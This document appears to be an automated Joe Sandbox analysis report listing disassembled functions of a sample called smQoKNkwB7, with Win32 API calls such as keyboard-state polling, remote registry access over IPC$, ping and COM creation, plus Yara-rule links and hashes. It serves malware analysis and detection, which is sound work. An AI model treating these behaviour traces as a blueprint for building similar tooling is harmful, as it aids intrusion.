Instruction Fuzzy Hash: D0316071911129BBD720AF64DC8CEFFBB7CEF46750F200169A949E2240DB749A85DAE0

Function 0024E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0024E6B4

Part of subcall function 001FE551: timeGetTime.WINMM(?,?,0024E6D4), ref: 001FE555

Sleep.KERNEL32(0000000A), ref: 0024E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0024E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0024E727
SetActiveWindow.USER32 ref: 0024E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0024E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0024E773
Sleep.KERNEL32(000000FA), ref: 0024E77E
IsWindow.USER32 ref: 0024E78A
EndDialog.USER32(00000000), ref: 0024E79B

Strings

BUTTON, xrefs: 0024E719

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 1aefa4665d421fa79532817985be01ac1e069d726b8e00b07cceae343c11be9f
Instruction ID: 8ac0b99b8889afc3b7d3471fc8608602fff3b99f1ba5c072c5100f1aa81ae5bf
Opcode Fuzzy Hash: 1aefa4665d421fa79532817985be01ac1e069d726b8e00b07cceae343c11be9f
Instruction Fuzzy Hash: 14219FB0A10305EFFF085F30FCCEA257B6DF755799F611528F90A811A1DB71ACA48A24

Function 0024E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0024EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0024EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0024EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0024EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0024EAA7

Strings

close PlayMe, xrefs: 0024EA6E, 0024EA9B
play PlayMe, xrefs: 0024EAA2
open , xrefs: 0024EA0C
status PlayMe mode, xrefs: 0024EA58
play PlayMe wait, xrefs: 0024EA91
alias PlayMe, xrefs: 0024EA36

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: ef9c91b8483e1a7db702451b11622ac463aa4d2c1a9904f25896b87b83c69631
Instruction ID: 992e2d68d6efc4337bfe8f8b1871a91582013d44dec0c874e3d1fcb8eb64ba33
Opcode Fuzzy Hash: ef9c91b8483e1a7db702451b11622ac463aa4d2c1a9904f25896b87b83c69631
Instruction Fuzzy Hash: 08115431A6026A7AE724A7A2DC4EDFF6A7CFBD3B00F4504297411A20D1EF704955C5B0

Function 00245CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00245CE2
GetWindowRect.USER32(00000000,?), ref: 00245CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00245D59
GetDlgItem.USER32(?,00000002), ref: 00245D69
GetWindowRect.USER32(00000000,?), ref: 00245D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00245DCF
GetDlgItem.USER32(?,000003E9), ref: 00245DDD
GetWindowRect.USER32(00000000,?), ref: 00245DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00245E31
GetDlgItem.USER32(?,000003EA), ref: 00245E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00245E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00245E67

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 1c15387e121d80bf4e91902ee933ef01663a91cf298a3dffd89e4ab6ab8357d6
Instruction ID: f77259556da5e231978ac5f88864c3e841fac6d631720d484db15c5dde590684
Opcode Fuzzy Hash: 1c15387e121d80bf4e91902ee933ef01663a91cf298a3dffd89e4ab6ab8357d6
Instruction Fuzzy Hash: 53512E70B10615AFDB18CF68DD89AAEBBB9FF88310F248129F519E6291D7709E50CB50

Function 001F8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 001F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001F8BE8,?,00000000,?,?,?,?,001F8BBA,00000000,?), ref: 001F8FC5

DestroyWindow.USER32(?), ref: 001F8C81
KillTimer.USER32(00000000,?,?,?,?,001F8BBA,00000000,?), ref: 001F8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00236973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,001F8BBA,00000000,?), ref: 002369A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,001F8BBA,00000000,?), ref: 002369B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,001F8BBA,00000000), ref: 002369D4
DeleteObject.GDI32(00000000), ref: 002369E6

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 3d5bef2129a1ecd4419f1f00edb9e23c1ed55d8bd0bb659360759307f61b1304
Instruction ID: 925c3bd001264a198a3b5cdd2e75e33355f46ccbc8fa981b2abfbbfcdbd4d7a5
Opcode Fuzzy Hash: 3d5bef2129a1ecd4419f1f00edb9e23c1ed55d8bd0bb659360759307f61b1304
Instruction Fuzzy Hash: 1261AB70512A09EFDB259F24E95CB75B7F1FB40312F64861CE2469B960CB31A9E0CFA0

Function 001F9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 001F9944: GetWindowLongW.USER32(?,000000EB), ref: 001F9952

GetSysColor.USER32(0000000F), ref: 001F9862

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 8648196932e8a40dd6115a1fa88e7380c89fa1be7417d2bec7b87a7d786f7c20
Instruction ID: c422993d01e9da16e03abd9e20365b1dcc9410c7a92361e03af38e7cedb8d3ed
Opcode Fuzzy Hash: 8648196932e8a40dd6115a1fa88e7380c89fa1be7417d2bec7b87a7d786f7c20
Instruction Fuzzy Hash: 0541E771104648AFDF346F38AC88BB93B65FB46370F654619FAA6872E1C7319D82DB10

Function 002496E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0022F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00249717
LoadStringW.USER32(00000000,?,0022F7F8,00000001), ref: 00249720

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0022F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00249742
LoadStringW.USER32(00000000,?,0022F7F8,00000001), ref: 00249745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00249866

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0024984A
Error: , xrefs: 0024981D
^ ERROR, xrefs: 002497FB
Line %d:, xrefs: 002497A0
Line %d (File "%s"):, xrefs: 0024978F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 9c9a8f7d5065a6401e2d29fc1e8aa2763e5cbb03556ba7c37090a2a375bb725e
Instruction ID: 5b529dbe71e47a10e90036d4fc38e2f7d1a8148a2c0f45bb99d9a88fd89282fb
Opcode Fuzzy Hash: 9c9a8f7d5065a6401e2d29fc1e8aa2763e5cbb03556ba7c37090a2a375bb725e
Instruction Fuzzy Hash: 24415E72800649ABCF18FBE1DD86DEEB778AF65340F600065F60572092EB356F99CB61

Function 002406DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002407A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002407BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002407DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00240804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0024082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00240837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0024083C

Strings

\CLSID, xrefs: 00240724
\IPC$, xrefs: 00240784
SOFTWARE\Classes\, xrefs: 0024070E

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 4f6a57d70040d9960290a5181080fe53411d8b79a87f0dd9c4e839b6b107173d
Instruction ID: 4e501eb67a41ffdb2377e149a93dc3c1f406a55f5cf08da8f9a9e48c71c87cab
Opcode Fuzzy Hash: 4f6a57d70040d9960290a5181080fe53411d8b79a87f0dd9c4e839b6b107173d
Instruction Fuzzy Hash: 0C415872C10629ABCF25EFA1DC89CEEB778FF54350F544129E901A7161EB30AE54CBA0

Function 00263C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00263C5C
CoInitialize.OLE32(00000000), ref: 00263C8A
CoUninitialize.OLE32 ref: 00263C94
_wcslen.LIBCMT ref: 00263D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00263DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00263ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00263F0E
CoGetObject.OLE32(?,00000000,0027FB98,?), ref: 00263F2D
SetErrorMode.KERNEL32(00000000), ref: 00263F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00263FC4
VariantClear.OLEAUT32(?), ref: 00263FD8

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: bc14cc11341959b6699686a22afc9324fb55231955038b8737849efe32a2553e
Instruction ID: 0bbd7fb6de2896df300ebebc0528f6d0940bff0f57d8abd72000b5e8fa21e46b
Opcode Fuzzy Hash: bc14cc11341959b6699686a22afc9324fb55231955038b8737849efe32a2553e
Instruction Fuzzy Hash: F3C166716183019FD700DF68C88492BB7E9FF89744F10492DF98A9B251D731EE95CB62

Function 00257A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00257AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00257B8F
SHGetDesktopFolder.SHELL32(?), ref: 00257BA3
CoCreateInstance.OLE32(0027FD08,00000000,00000001,002A6E6C,?), ref: 00257BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00257C74
CoTaskMemFree.OLE32(?,?), ref: 00257CCC
SHBrowseForFolderW.SHELL32(?), ref: 00257D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00257D7A
CoTaskMemFree.OLE32(00000000), ref: 00257D81
CoTaskMemFree.OLE32(00000000), ref: 00257DD6
CoUninitialize.OLE32 ref: 00257DDC

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: e43686bbd824b13b70c44f14bfde4d09980f9f4c3eb0b250c666da0d74fadb13
Instruction ID: e05ce6da79d2b6a352ef3e04b0a5eea67fd7b06b17cfbacf2c38f06aec23468e
Opcode Fuzzy Hash: e43686bbd824b13b70c44f14bfde4d09980f9f4c3eb0b250c666da0d74fadb13
Instruction Fuzzy Hash: EFC14C75A14109AFCB14DFA4D888DAEBBF9FF48305B148499E81ADB361D730ED45CB90

Function 0027541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00275504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00275515
CharNextW.USER32(00000158), ref: 00275544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00275585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0027559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002755AC

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 6040cbde07ab70a658c578c11d62ff0843d950c87f2d9879a1744c68ac459686
Instruction ID: 095240bf76f90fde06d6ff7762eecb2a6ad8b40cca443c501a19564dd6d540ba
Opcode Fuzzy Hash: 6040cbde07ab70a658c578c11d62ff0843d950c87f2d9879a1744c68ac459686
Instruction Fuzzy Hash: 2761B430920629EFDF108F60DC859FFBB79FF05760F508149F619A6290D7B49AA0DB60

Function 0023FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0023FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0023FB08
VariantInit.OLEAUT32(?), ref: 0023FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0023FB3A
VariantCopy.OLEAUT32(?,?), ref: 0023FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0023FBA1
VariantClear.OLEAUT32(?), ref: 0023FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0023FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0023FBCC
VariantClear.OLEAUT32(?), ref: 0023FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0023FBE9

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: de8e0db11960257adbd816a8d45f2298f7bb009021f09f116babd1250e380130
Instruction ID: 4a0ad46e7643d8ed3553f34748c23f08dafabc1e1f28a2f8cb46891382b0d118
Opcode Fuzzy Hash: de8e0db11960257adbd816a8d45f2298f7bb009021f09f116babd1250e380130
Instruction Fuzzy Hash: 164162B5E102199FCB00DF64EC689AEBBB9FF18344F108069E955A7261D730A955CF90

Function 00249C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00249CA1
GetAsyncKeyState.USER32(000000A0), ref: 00249D22
GetKeyState.USER32(000000A0), ref: 00249D3D
GetAsyncKeyState.USER32(000000A1), ref: 00249D57
GetKeyState.USER32(000000A1), ref: 00249D6C
GetAsyncKeyState.USER32(00000011), ref: 00249D84
GetKeyState.USER32(00000011), ref: 00249D96
GetAsyncKeyState.USER32(00000012), ref: 00249DAE
GetKeyState.USER32(00000012), ref: 00249DC0
GetAsyncKeyState.USER32(0000005B), ref: 00249DD8
GetKeyState.USER32(0000005B), ref: 00249DEA

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: f376d463465aab13342d0297aa8e54cc4d3041f6afca04ed9c6acc2cdb95b92b
Instruction ID: 54c653b469bfbe80367b59f0a585d2c4a68ef34319dd4862ddabfd8bf256b25b
Opcode Fuzzy Hash: f376d463465aab13342d0297aa8e54cc4d3041f6afca04ed9c6acc2cdb95b92b
Instruction Fuzzy Hash: 3A41E830A147CB6DFF389F74C8443B7BEA0AB16304F44805ECAC6561C2D7A599E4CB92

Function 0026055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 002605BC
inet_addr.WSOCK32(?), ref: 0026061C
gethostbyname.WSOCK32(?), ref: 00260628
IcmpCreateFile.IPHLPAPI ref: 00260636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002606C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002606E5
IcmpCloseHandle.IPHLPAPI(?), ref: 002607B9
WSACleanup.WSOCK32 ref: 002607BF

Strings

Ping, xrefs: 00260676

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: c12aa211b4875fb4c3e8618e814e19561da88cfb5161ba25dd5753e3974a4659
Instruction ID: b5713db49bc8f0486bb1e2fac8b6b50329a3f9fe1aa5be2374e72e69e930bf1a
Opcode Fuzzy Hash: c12aa211b4875fb4c3e8618e814e19561da88cfb5161ba25dd5753e3974a4659
Instruction Fuzzy Hash: C6919E356142429FD321CF25D8C8F1BBBE4AF44318F1485A9F46A8B6A2C770ED91DF91

Function 00268CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00268CF3

Part of subcall function 00248E54: _wcslen.LIBCMT ref: 00248E77

_wcslen.LIBCMT ref: 00268D4E
_wcslen.LIBCMT ref: 00268D9C
_wcslen.LIBCMT ref: 00268DDC
_wcslen.LIBCMT ref: 00268E6E

Strings

stdcall, xrefs: 00268DD6, 00268DDB
none, xrefs: 00268E65, 00268E6A
cdecl, xrefs: 00268D48, 00268D4D
winapi, xrefs: 00268D96, 00268D9B

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 92175172fe2f0033ffad2ed6bb6bd7d3ae3744387879e5bb47edd7afb7369d36
Instruction ID: 8fc83b6135982bfb9c971d7122a8dce29f468629be6b6d230a21b5903ed03d7c
Opcode Fuzzy Hash: 92175172fe2f0033ffad2ed6bb6bd7d3ae3744387879e5bb47edd7afb7369d36
Instruction Fuzzy Hash: B751BF31A205179BCB24DF68C8509BEB3A5BF65724B604329F926E72C4EB31DDA0C790

Function 0026372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00263774
CoUninitialize.OLE32 ref: 0026377F
CoCreateInstance.OLE32(?,00000000,00000017,0027FB78,?), ref: 002637D9
IIDFromString.OLE32(?,?), ref: 0026384C
VariantInit.OLEAUT32(?), ref: 002638E4
VariantClear.OLEAUT32(?), ref: 00263936

Strings

Failed to create object, xrefs: 002637E4, 0026389A
NULL Pointer assignment, xrefs: 0026381E
Invalid parameter, xrefs: 00263865

Memory Dump Source

